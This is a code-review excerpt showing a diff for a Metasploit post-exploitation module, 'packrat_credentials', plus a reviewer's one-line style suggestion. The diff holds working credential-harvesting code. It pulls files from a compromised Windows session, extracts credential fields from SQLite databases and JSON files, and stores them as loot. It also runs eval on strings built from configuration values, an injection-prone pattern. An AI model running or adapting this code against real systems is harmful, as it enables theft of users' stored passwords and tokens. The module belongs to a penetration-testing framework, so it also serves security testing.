modules/post/windows/gather/credentials/packrat_credentials.rb

```diff
@@ -0,0 +1,273 @@
+
+      artifact_child[:sql_search].each do |sql_child|
+        select_db_info = database_file.prepare "SELECT #{sql_child[:sql_column]} FROM #{sql_child[:sql_table]}"
+        execute_command = select_db_info.execute
+        execute_command.each do |database_row|
+          join_info = database_row.join "\s"
+          line_split = join_info.chomp + "\n"
+          database_string << line_split.to_s
+        end
+      end
+
+      sql_credential_path = store_loot("#{artifact}#{cred}", "", session, "#{database_string}", local_loc) #saves neatened up database file
+      print_status "File with credentials saved:  #{sql_credential_path}"
+
+    rescue StandardError => error_message
+      print_status error_message.to_s
+    end
+  end
+
+  def extract_json(saving_path, artifact_child, artifact, local_loc)
+    begin
+      json_file = File.read("#{saving_path}")
+      json_parse = JSON.parse(json_file)
+      parent_json_query = ''
+      child_json_query = []
+      json_credential_save = []
+      json_cred = ''
+      cred = "CREDENTIALS"
+
+      artifact_child[:json_search].each do |json_split|
+        parent_json_query << json_split[:json_parent]
+        json_split[:json_children].each do |json_child|
+          child_json_query << json_child.to_s
+        end #json_child end
+      end #json_split end
+
+      child_json_query.each do |split|
+        children = eval("json_parse#{parent_json_query}")
+        children.each {|child_node|
+          child = eval("child_node#{split}").to_s
+          json_credential_save << "#{split}:  #{child}"
+        }
+      end
+
+      json_credential_save.each do |json_save|
+        file_save = json_save.chomp + "\n"
+        print_good file_save.to_s
+        json_cred << file_save.to_s
+      end #json_save end
+      json_credential_path = store_loot("#{artifact}#{cred}", "", session, "#{json_cred}", local_loc) #saves crdentials for each file
+      print_status "File with credentials saved:  #{json_credential_path}"
+    rescue StandardError => error_message
+      print_status error_message.to_s
+    end
+  end
+
+  #Download file from the remote system, if it exists.
+  def download(profile, opts = {})
+
+    artifact_parent = opts[:file_artifact]
+    artifact_parent.each do |artifact_child|
+      category = opts[:category]
+      application = opts[:application]
+      artifact = artifact_child[:artifact]
+      file_type = artifact_child[:filetypes]
+      path = artifact_child[:path]
+      credential_type = artifact_child[:credential_type]
+      description = artifact_child[:description]
+
+      # filter based on options
+      if (category != datastore['APPCATEGORY'] && datastore['APPCATEGORY'] != 'All') || (application != datastore['APPLICATION'] && datastore['APPLICATION'] != 'All') || (file_type != datastore['ARTIFACTS'] && datastore['ARTIFACTS'] != 'All')
+        # doesn't match search criteria, skip this artifact
+        next
```

Comment:
```suggestion
        next if (category != datastore['APPCATEGORY'] && datastore['APPCATEGORY'] != 'All') || (application != datastore['APPLICATION'] && datastore['APPLICATION'] != 'All') || (file_type != datastore['ARTIFACTS'] && datastore['ARTIFACTS'] != 'All')
```
and delete end statement below